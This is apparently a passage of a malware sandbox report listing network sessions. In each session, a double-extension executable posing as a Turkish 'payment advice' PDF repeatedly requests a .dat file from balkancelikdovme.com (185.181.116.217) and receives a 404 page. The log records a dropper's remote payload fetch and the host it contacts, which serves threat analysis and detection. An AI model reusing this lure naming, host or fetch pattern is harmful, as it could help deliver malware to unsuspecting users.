      2024-12-16 13:25:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      45192.168.2.549905185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:54 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:54 GMT
      vary: User-Agent
      2024-12-16 13:25:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      46192.168.2.549910185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:56 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:56 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:56 GMT
      vary: User-Agent
      2024-12-16 13:25:56 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      47192.168.2.549915185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:58 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:25:58 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:25:58 GMT
      vary: User-Agent
      2024-12-16 13:25:58 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      48192.168.2.549921185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:25:59 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:00 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:00 GMT
      vary: User-Agent
      2024-12-16 13:26:00 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      49192.168.2.549925185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:01 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:02 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:02 GMT
      vary: User-Agent
      2024-12-16 13:26:02 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      50192.168.2.549931185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:03 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:04 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:03 GMT
      vary: User-Agent
      2024-12-16 13:26:04 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      51192.168.2.549936185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:05 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:06 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:06 GMT
      vary: User-Agent
      2024-12-16 13:26:06 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      52192.168.2.549942185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:07 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:08 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:08 GMT
      vary: User-Agent
      2024-12-16 13:26:08 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      53192.168.2.549948185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:09 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:10 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:09 GMT
      vary: User-Agent
      2024-12-16 13:26:10 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      54192.168.2.549952185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:11 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:12 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:12 GMT
      vary: User-Agent
      2024-12-16 13:26:12 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      55192.168.2.549955185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:13 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:14 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:13 GMT
      vary: User-Agent
      2024-12-16 13:26:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      56192.168.2.549961185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:15 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:16 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:16 GMT
      vary: User-Agent
      2024-12-16 13:26:16 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      57192.168.2.549967185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:17 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:18 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:18 GMT
      vary: User-Agent
      2024-12-16 13:26:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      58192.168.2.549973185.181.116.2174436480C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:26:19 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:26:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:26:20 GMT
      vary: User-Agent
